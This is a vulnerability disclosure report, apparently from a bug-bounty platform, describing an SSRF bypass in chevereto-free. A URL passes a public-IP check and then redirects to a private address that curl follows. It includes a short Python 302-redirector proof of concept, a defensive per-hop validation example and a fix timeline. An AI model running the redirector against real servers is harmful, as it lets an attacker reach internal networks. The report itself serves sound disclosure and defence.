Server-Side Request Forgery (SSRF) in rodber/chevereto-free


Reported on

Dec 30th 2021


There was some hardening done previously against private IP addresses in the SSRF vulnerability I disclosed in the previous report. However, the checks can be bypassed by URL redirection.

Proof of Concept

If the submitted URL resolves to a public IP address, it passes the isValidUrl check. If that same URL then redirects to a private IP address by serving a 302 response, curl_exec will query the private address instead when the URL is passed to it, because CURLOPT_FOLLOWLOCATION is set to 1, which tells curl to follow redirects.

A redirector for testing can be set up like this:

import sys
from http.server import HTTPServer, BaseHTTPRequestHandler

if len(sys.argv) - 1 != 2:
    print("Usage: {} <port_number> <url>".format(sys.argv[0]))
    sys.exit(1)

class Redirect(BaseHTTPRequestHandler):
    # Answer every GET with a 302 whose Location is the URL given on the command line
    def do_GET(self):
        self.send_response(302)
        self.send_header('Location', sys.argv[2])
        self.end_headers()

HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever()

Usage:

python [port] [redirect_url]


This vulnerability is capable of SSRF (the server makes requests to the internal network).



Redirect following should be disabled for file_get_contents too, since PHP's HTTP stream wrapper follows redirects by default.
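One way to close the gap described above is to stop the HTTP client from following redirects and instead walk each hop manually, re-running the private-IP check before every request. The following is an added example, not Chevereto's code: the is_public_ip/validate_url/fetch_url names, the fake DNS table and the stub HTTP client are assumptions constructed so it runs offline.

```python
import ipaddress
import socket
from urllib.parse import urljoin, urlsplit
REDIRECT_CODES = {301, 302, 303, 307, 308}

def is_public_ip(ip):
    # Rejects RFC 1918, loopback, link-local, CGNAT, multicast and other reserved ranges.
    addr = ipaddress.ip_address(ip)
    return addr.is_global and not addr.is_multicast

def validate_url(url, resolve=socket.gethostbyname):
    # isValidUrl-style gate: http(s) only, host must resolve to a public address. Resolving
    # here and connecting later leaves a DNS-rebinding window; pin the IP if that matters.
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        raise ValueError("unsupported URL: %r" % url)
    ip = resolve(parts.hostname)
    if not is_public_ip(ip):
        raise ValueError("%s resolves to non-public %s" % (parts.hostname, ip))
    return ip

def fetch_url(url, request, resolve=socket.gethostbyname, max_redirects=5):
    # request(url) performs ONE request with redirect following disabled and returns
    # (status, headers, body). Every hop is validated first, the step FOLLOWLOCATION skips.
    for _ in range(max_redirects + 1):
        validate_url(url, resolve)
        status, headers, body = request(url)
        location = headers.get("location")
        if status in REDIRECT_CODES and location:
            url = urljoin(url, location)
            continue
        return url, status, body
    raise ValueError("too many redirects")

# Constructed offline stand-ins for DNS and HTTP, modelling the report's redirector.
FAKE_DNS = {"redirector.example": "8.8.8.8", "public.example": "8.8.4.4",
            "intranet.example": "10.0.0.5"}
def fake_request(url):
    if urlsplit(url).hostname == "redirector.example":
        return 302, {"location": "http://intranet.example/admin"}, b""
    return 200, {}, b"public content"

def demo():
    # Runs the report's scenario: public redirector -> 302 -> private host.
    try:
        fetch_url("http://redirector.example/img.png", fake_request, FAKE_DNS.__getitem__)
    except ValueError as exc:
        return str(exc)
    return None
```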

Timeline

We are processing your report and will contact the rodber/chevereto-free team within 24 hours.
haxatron modified the report
haxatron submitted a
We have contacted a member of the rodber/chevereto-free team and are waiting to hear back
We have sent a follow up to the rodber/chevereto-free team. We will try again in 7 days.
Rodolfo Berrios validated this vulnerability
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
Rodolfo Berrios marked this as fixed in 1.6.2 with commit 586031
haxatron has been awarded the fix bounty
This vulnerability will not receive a CVE
functions.php#L1651 has been validated
functions.php#L1691L1693 has been validated